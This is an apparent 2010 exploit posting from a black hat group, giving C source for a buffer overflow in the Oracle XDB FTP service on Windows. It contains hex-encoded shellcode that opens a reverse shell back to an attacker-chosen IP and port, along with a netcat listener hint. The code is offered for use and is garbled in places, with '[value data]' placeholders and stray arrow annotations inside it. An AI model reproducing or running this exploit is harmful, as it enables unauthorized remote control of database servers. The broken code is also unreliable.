oraclexdb-overflow.txt
Posted on 18 March 2010
[+] vulnerabilities network level/stack based buffer overflow [+] special network layer attack [+] implemented over http/XML-db/ftp==>windows XDB [+] connecting:8080 [=] operation: win 32-->xdb overflow [+] author mc2_s3lector [+] yogyacarderlink.web.id/KeDai Computerworks.com exploit win32 #include <stdio.h> #include <windows.h> #include <winsock.h> int GainControlOfOracle(char *, char *); int StartWinsock(void); int SetUpExploit(char *,int); struct sockaddr_in s_sa; struct hostent *he; unsigned int addr; char host[value data]=""; //register acces\ unsigned char exploit[value data]= "x55x8BxECxEBx03x5BxEBx05xE8xF8xFFxFFxFFxBExFFxFF" "xFFxFFx81xF6xDCxFExFFxFFx03xDEx33xC0x50x50x50x50" "x50x50x50x50x50x50xFFxD3x50x68x61x72x79x41x68x4C" "x69x62x72x68x4Cx6Fx61x64x54xFFx75xFCxFFx55xF4x89" "x45xF0x83xC3x63x83xC3x5Dx33xC9xB1x4ExB2xFFx30x13" "x83xEBx01xE2xF9x43x53xFFx75xFCxFFx55xF4x89x45xEC" "x83xC3x10x53xFFx75xFCxFFx55xF4x89x45xE8x83xC3x0C" "x53xFFx55xF0x89x45xF8x83xC3x0Cx53x50xFFx55xF4x89" "x45xE4x83xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xE0x83" "xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xDCx83xC3x08x89" "x5DxD8x33xD2x66x83xC2x02x54x52xFFx55xE4x33xC0x33" "xC9x66xB9x04x01x50xE2xFDx89x45xD4x89x45xD0xBFx0A" "x01x01x26x89x7DxCCx40x40x89x45xC8x66xB8xFFxFFx66" "x35xFFxCAx66x89x45xCAx6Ax01x6Ax02xFFx55xE0x89x45" "xE0x6Ax10x8Dx75xC8x56x8Bx5DxE0x53xFFx55xDCx83xC0" "x44x89x85x58xFFxFFxFFx83xC0x5Ex83xC0x5Ex89x45x84" "x89x5Dx90x89x5Dx94x89x5Dx98x8DxBDx48xFFxFFxFFx57" "x8DxBDx58xFFxFFxFFx57x33xC0x50x50x50x83xC0x01x50" "x83xE8x01x50x50x8Bx5DxD8x53x50xFFx55xECxFFx55xE8" "x60x33xD2x83xC2x30x64x8Bx02x8Bx40x0Cx8Bx70x1CxAD" "x8Bx50x08x52x8BxC2x8BxF2x8BxDAx8BxCAx03x52x3Cx03" "x42x78x03x58x1Cx51x6Ax1Fx59x41x03x34x08x59x03x48" "x24x5Ax52x8BxFAx03x3Ex81x3Fx47x65x74x50x74x08x83" "xC6x04x83xC1x02xEBxECx83xC7x04x81x3Fx72x6Fx63x41" "x74x08x83xC6x04x83xC1x02xEBxD9x8BxFAx0FxB7x01x03" "x3Cx83x89x7Cx24x44x8Bx3Cx24x89x7Cx24x4Cx5Fx61xC3" "x90x90x90xBCx8Dx9Ax9Ex8Bx9AxAFx8Dx90x9Cx9Ax8Cx8C" "xBExFFxFFxBAx87x96x8BxABx97x8Dx9Ax9Ex9BxFFxFFxA8" "x8CxCDxA0xCCxCDxD1x9Bx93x93xFFxFFxA8xACxBExACx8B" "x9Ex8Dx8Bx8Ax8FxFFxFFxA8xACxBExACx90x9Cx94x9Ax8B" "xBExFFxFFx9Cx90x91x91x9Ax9Cx8BxFFx9Cx92x9BxFFxFF" "xFFxFFxFFxFF"; char exploit_code[value data]= "UNLOCK / put character" "put character" "put character" "put character" "put character" --------->char or nummeric-----or combine chart&nummeric "5eeefffggghhh"; char exception_handler[value dataX]="x79x9Bxf7x77"; char short_jump[value dataX]="xEBx06x90x90"; int main(int argc, char *argv[]) { if(argc != 6) { printf(" Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit"); printf(" Spawns a reverse shell to specified port"); printf(" Usage: %s host userid password ipaddress port",argv[0]); printf(" 6th maret 2010 "); return 0; } strncpy(host,argv[1],250); if(StartWinsock()==0) return printf("Error starting Winsock. "); SetUpExploit(argv[4],atoi(argv[5])); strcat(exploit_code,short_jump); strcat(exploit_code,exception_handler); strcat(exploit_code,exploit); strcat(exploit_code," "); GainControlOfOracle(argv[2],argv[3]); return 0; } int SetUpExploit(char *myip, int myport)--->protocol { unsigned int ip=0; unsigned short prt=0; char *ipt=""; char *prtt=""; ip = inet_addr(myip); ipt = (char*)&ip; exploit[value data]=ipt[0]; exploit[value data]=ipt[1]; exploit[value data]=ipt[2]; exploit[value data]=ipt[3]; // set the TCP port to connect on // netcat should be listening on this port // e.g. nc -l -p 80 prt = htons((unsigned short)myport); prt = prt ^ 0xFFFF; prtt = (char *) &prt; exploit[value data]=prtt[0]; exploit[value data]=prtt[1]; return 0; } int StartWinsock() { int err=0; WORD wVersionRequested; WSADATA wsaData; wVersionRequested = MAKEWORD( 2, 0 ); err = WSAStartup( wVersionRequested, &wsaData ); if ( err != 0 ) return 0; if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 ) { WSACleanup( ); return 0; } if (isalpha(host[0])) { he = gethostbyname(host); s_sa.sin_addr.s_addr=INADDR_ANY; s_sa.sin_family=AF_INET; memcpy(&s_sa.sin_addr,he->h_addr,he->h_length); } else { addr = inet_addr(host); s_sa.sin_addr.s_addr=INADDR_ANY; s_sa.sin_family=AF_INET; memcpy(&s_sa.sin_addr,&addr,4); he = (struct hostent *)1; } if (he == NULL) { return 0; } return 1; } int GainControlOfOracle(char *user, char *pass) { char usercmd[value dataXX]="user "; char passcmd[value dataXX]="pass "; char resp[1600]=""; int snd=0,rcv=0; struct sockaddr_in r_addr; SOCKET sock; strncat(usercmd,user,230); strcat(usercmd," "); strncat(passcmd,pass,230); strcat(passcmd," "); sock=socket(AF_INET,SOCK_STREAM,0); if (sock==INVALID_SOCKET) return printf(" sock error"); r_addr.sin_family=AF_INET; r_addr.sin_addr.s_addr=INADDR_ANY; r_addr.sin_port=htons((unsigned short)0); s_sa.sin_port=htons((unsigned short)2100); if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) return printf("Connect error"); rcv = recv(sock,resp,1500,0); printf("%s",resp); ZeroMemory(resp,1600); snd=send(sock, usercmd , strlen(usercmd) , 0); rcv = recv(sock,resp,1500,0); printf("%s",resp); ZeroMemory(resp,1600); snd=send(sock, passcmd , strlen(passcmd) , 0); rcv = recv(sock,resp,1500,0); printf("%s",resp); if(resp[0]=='5') { closesocket(sock); return printf("Failed to log in using user %s and password %s. ",user,pass); } ZeroMemory(resp,1600); snd=send(sock, exploit_code, strlen(exploit_code) , 0); Sleep(2000); closesocket(sock); return 0; } big thank to; ================================================================================ indonesian black hat team(www.yogyacarderlink.web.id) KeDaiComputerworks.com Jasakom(jasakom.com) indonesianhacker.org Indesign COmputer Care (INDESIGN) Indonesian hacker(indonesianhacker.org) one-day(the-codec),n3r0,elpaciano ================================================================================
